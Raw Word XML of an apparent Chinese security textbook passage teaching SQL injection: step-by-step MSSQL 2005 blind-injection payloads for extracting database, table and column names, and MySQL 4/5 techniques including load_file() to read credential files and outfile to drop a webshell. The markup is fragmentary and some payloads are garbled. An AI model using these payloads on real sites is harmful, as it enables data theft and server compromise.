        </w:rPr>
        <w:t>如果MsSQL 2005数据库关闭了错误信息，那么无法直接爆出数据内容，只有通过盲注入攻击技术，一步一步猜出数据库内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08982684" w14:textId="77777777" w:rsidR="007C5CF9" w:rsidRPr="00276D91" w:rsidRDefault="007C5CF9"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猜数据库dbid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A42FC" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="007C5CF9"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注入查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B89DC1" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="007C5CF9"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and (select count(*) from master.dbo.sysdatabases where dbid=1)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2988D7A5" w14:textId="77777777" w:rsidR="00E31EEA" w:rsidRPr="00764DAB" w:rsidRDefault="00E31EEA" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>逐步增加粗体黑色数字1,当页面返回出错时，可得到数据库dbid的最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C5A951" w14:textId="77777777" w:rsidR="00E31EEA" w:rsidRPr="00276D91" w:rsidRDefault="00E31EEA"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2.猜数据库名长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD29C6" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00E31EEA" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="50" w:firstLine="105"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定数据库的dbid值，可以猜解出数据库名的长度。在注入点处提交如下注入查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09383DE5" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="008F4886"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 (select count(*) from master.dbo.sysdatabases where dbid=dbid值 and len(name)&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAB1DB5" w14:textId="77777777" w:rsidR="004C58EB" w:rsidRPr="00276D91" w:rsidRDefault="004C58EB"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3.猜解数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F8657" w14:textId="77777777" w:rsidR="00693A0D" w:rsidRPr="00764DAB" w:rsidRDefault="004C58EB"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猜解数据库名的方法，与Access注入猜解原理类似，通过判断数据库名每一位的ASCII码</w:t>
      </w:r>
      <w:r w:rsidR="00693A0D" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值，返回查出其对应的字符，从而得到完整的数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF18C6C" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00693A0D"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在注入点处提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4FCBF" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="006C2AF1"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 (select count(*)frommaster.dbo.sysdatabases where dbid=dbid 值 and ascii(substring(name,1,1))&gt;1&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778132B4" w14:textId="77777777" w:rsidR="006C2AF1" w:rsidRPr="00764DAB" w:rsidRDefault="006C2AF1"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递增第三个黑体数字1的值，可得到数据库名第一位字符对应的ASCII码值。然后用同样的方法可以猜解出其他位字符的ASCII码值，反查得出数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32832564" w14:textId="77777777" w:rsidR="006C2AF1" w:rsidRPr="00276D91" w:rsidRDefault="006C2AF1"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4.猜解管理员表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E4CDC" w14:textId="77777777" w:rsidR="006C2AF1" w:rsidRPr="00764DAB" w:rsidRDefault="006C2AF1"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得到数据库名后，可以用同样的方法反查ASCII码，猜解出管理员表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D178477" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="006C2AF1"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lastRenderedPageBreak/>
        <w:t>首先，在注入点处提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A419C79" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="0030778E" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and (select count(*) from master.dbo.sysdatabases where dbid=1)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421CC697" w14:textId="77777777" w:rsidR="00565096" w:rsidRPr="00764DAB" w:rsidRDefault="00565096" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="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该语句可以尝试查看是否有包含adman的管理员表名。如果该数据库中包含敏感的管理员表，则可继续猜测其中的表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FB79C7" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00565096" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先猜解表名长度，提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7BA8DA" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00565096"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 (select count(*) from mas</w:t>
      </w:r>
      <w:r w:rsidR="009C26C9" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ter</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.dbo.sysdatabases where dbid=dbid 值 and len (name)&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090979B5" w14:textId="77777777" w:rsidR="000B6594" w:rsidRPr="00764DAB" w:rsidRDefault="000B6594"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递增黑体数字1，直到页面返回错误信息，可得到表名长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8EC54F" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="000B6594"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然后猜解表名内容，提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F343626" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="009C26C9"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 (select count(*) from master.dbo.sysdatabases where dbid=dbid 值 and ascii(substring(name,1,1))&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00DF5768" w:rsidRPr="00764DAB">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gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E3076" w14:textId="77777777" w:rsidR="0025660D" w:rsidRPr="00764DAB" w:rsidRDefault="0025660D"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递增第三个黑体数字1，直到页面返回错误信息，可得到表名第一位字符对应的ASCII码值。用同样的方法，可以猜解出其他位对应的ASCII码值，反查出表名字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286604D9" w14:textId="77777777" w:rsidR="0025660D" w:rsidRPr="00276D91" w:rsidRDefault="0025660D"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5.猜解字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4B479" w14:textId="77777777" w:rsidR="0025660D" w:rsidRPr="00764DAB" w:rsidRDefault="0025660D"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猜解出表名后，可以继续用同样的方法反查ASCII码，猜解出表中的字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C7647" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00015305"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and (select count(*) from 数据库名.dbo.syscolumns where name in (select top 1 name from 数据库名_db.dbo.syscolumns where id=object_id('数据库名.dbo.table')) and ascii(substring(name,1,1</w:t>
      </w:r>
      <w:r w:rsidR="00AE7578" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;1)=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2400F" w14:textId="77777777" w:rsidR="00F92D4D" w:rsidRPr="00764DAB" w:rsidRDefault="00F92D4D"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递增黑体数字1，直到页面返回错误信息，可得到表中的字段第一位字符对应的ASCII码值。用同样的方法，可以猜解出其他位对应的ASCII码值，反查出完整的字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90571E" w14:textId="77777777" w:rsidR="00F92D4D" w:rsidRPr="00276D91" w:rsidRDefault="00F92D4D" w:rsidP="001A202D">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6.猜解字段内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656AE14E" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00F92D4D" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>猜解字段内容的原理方法也类似，同样是反查ASCII码逐位进行猜解，可参考前面的Access数据库注入猜解方法及原理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50524B25" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="000D1545" w:rsidRDefault="00255B4C" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1545">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>系统表向攻击者泄密—MySQL注入技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019B42B" w14:textId="77777777" w:rsidR="00163F5D" w:rsidRPr="00CD76A0" w:rsidRDefault="00163F5D" w:rsidP="00BC5681">
      <w:pPr>
        <w:ind w:firstLineChars="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MySQL数据序在各种Web应用程序中的使用也非常广泛。与其他数据库一样，在Web应用程序编写的过程中，如果对用户提交的参数未进行过滤或过滤不严，也会导致SQL注入攻击漏洞的产生.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75219468" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00163F5D"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 xml:space="preserve"> MySQL数据库通常与PHP网页程序搭建网站平台，各大门户网站采用MySQL+PHP的网站结构，例如新浪、网易、TOM网站等.由于MySQL数据库的应用时象大多足一些大型的网站企业公司，因此针对MySQL数据库的注入攻击技术的危害性也非常大.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447623B" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00F82256" w:rsidRDefault="00003BD2" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F82256">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MySQL 数据库常见注入攻击技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619029B4" w14:textId="77777777" w:rsidR="00816212" w:rsidRPr="00CD76A0" w:rsidRDefault="00816212"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在MySQL 4及之前的版本中，由于不支持子语句查询，而且当“php.ini"配置文件中的magic_quotes_gpc参数设置为“On(开启)”时，提交的变量中包含'(单引号)，"(双引号)，以及反斜线、and和空字符等危险的字符，都会被数据库自动转为含有反斜线的转义字符，给注入攻击带来很大的困难.由于这个特性，导致许多管理员认为MySQL比较安全。然而率实上，安全永远是相对的，漏洞与攻击威胁的存在却是绝对的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729CC809" w14:textId="77777777" w:rsidR="00816212" w:rsidRPr="00CD76A0" w:rsidRDefault="00816212" w:rsidP="001A202D">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在MySQL 5版本数据库中，由于新增加了一个information_schema库，该库中存储了数据库信息内容，因此可以直接爆库、爆表、爆字段，让注入攻击变得极为简单。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B305D2" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00816212"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本节中，对最为常见的PHP+MySQL环境下的注入攻击技术进行介绍.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F30935" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00F82256"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3.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006A557A" w:rsidRPr="00F82256">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MySQL 4注入攻击技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4E768" w14:textId="77777777" w:rsidR="006A557A" w:rsidRPr="00CD76A0" w:rsidRDefault="006A557A" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="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MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况，因此在注入攻击上存在着很大的局限性，只能采用类似Access的方法进行查询猜解。MySQL 4的注入攻击方法如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E609D" w14:textId="77777777" w:rsidR="006A557A" w:rsidRPr="00CD76A0" w:rsidRDefault="006A557A"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首先，利用order by获得当前表的字段数，再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时，由于不知道数据库中的表名与字段名，因此只能像Access一样直接用常见表名和字段名进行猜测判断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D4D16" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="006A557A"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关于MySQL 4注入攻击的详细方法，可见参考本章章未的案例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66332DF7" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00F82256"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lastRenderedPageBreak/>
        <w:t>3.1.3</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00875E77" w:rsidRPr="00F82256">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00311F48">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00875E77" w:rsidRPr="00F82256">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL 5版本的注入攻击技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54774900" w14:textId="77777777" w:rsidR="00572A75" w:rsidRPr="00CD76A0" w:rsidRDefault="00572A75" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="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MySQL 5版本由于information_schema库的存在，注入攻击相对来说方便了许多，其使用方法通常有如下几种。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3870E5" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00572A75" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="10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通过对MySQL的数据进行猜解获取敏感的信息，来进一步通过网站的各种功能获取控制权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FF09C" w14:textId="77777777" w:rsidR="003B2A1C" w:rsidRPr="00CD76A0" w:rsidRDefault="003B2A1C" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过load_fileO函数来读取脚本代码或系统敏感文件内容，进行漏洞分析或直接获取数据库连接账号、密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE6E69" w14:textId="77777777" w:rsidR="003B2A1C" w:rsidRPr="00CD76A0" w:rsidRDefault="003B2A1C" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过dumpfile/outfile函数导出获取WebShell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E6E8A" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="003B2A1C" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用上面的这几种方法，可以很轻易地攻击入侵MySQL 5数据库搭建的网站服务器。下面我们来看看具体的注入攻击方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4593670B" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="003D1A09" w:rsidRDefault="006472F7" w:rsidP="001A202D">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3.1.4</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D002F7" w:rsidRPr="003D1A09">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>利用load_file()函数进行MySQL注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4F2B4" w14:textId="77777777" w:rsidR="00ED49C2" w:rsidRPr="00CD76A0" w:rsidRDefault="00ED49C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MySQL数据库注入攻击的常规方法同样可以利用union select查询。其步骤如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FB7D5" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00ED49C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首先，利用order by获得当前表的字段数，再使用union select联合查询来获取想要的数据库信息，包括数据库连接用户、数据库版本等。然后可利用load_fileQ函数，在union select联合查询中直接读取服务器上的文件。如果Web服务器和数据库服务器没有分离，找到Web路径之后还可以用select into outfileO函数，将一句话木马查询结果导出到Web目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7C5B6A" w14:textId="77777777" w:rsidR="00BB059C" w:rsidRPr="0026029F" w:rsidRDefault="00A65453" w:rsidP="0026029F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="majorBidi"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96210">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Mysql实战Webshell</w:t>
      </w:r>
      <w:r w:rsidR="00252C1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>（一）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCBE711" w14:textId="77777777" w:rsidR="008C5B57" w:rsidRPr="009937DC" w:rsidRDefault="00E12696" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidR="008C5B57" w:rsidRPr="009937DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="004D306A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="004D306A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">order by </w:t>
      </w:r>
      <w:r w:rsidR="004D306A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>查询字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C773A"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需要通过mysql语句更进一步的进行测试，开始使用order by 。order by 语句可以对查询结果进行排列，上面的语句中有两列，使用order by 语句可以按照第一列first_name或者第二列last_name对结果进行排列。假如我们想根据第三列对结果进行排序，因为查询语句中不存在第三列，就会产生报错：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26D63F"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ERROR 1054 (42S22): Unknown column ’3′ in ‘order clause’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5F120"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当我们使用order by 2的时候没有产生任何错误，而使用order by 3的时候产生报错，说明数据库中只有两列；通过这种方法我们可以使用order by语句猜测数据库表中的列数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673021FA"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user id输入’ order by 3+–+的时候，后端SQL查询语句如下：</w:t>
      </w:r>
    </w:p>
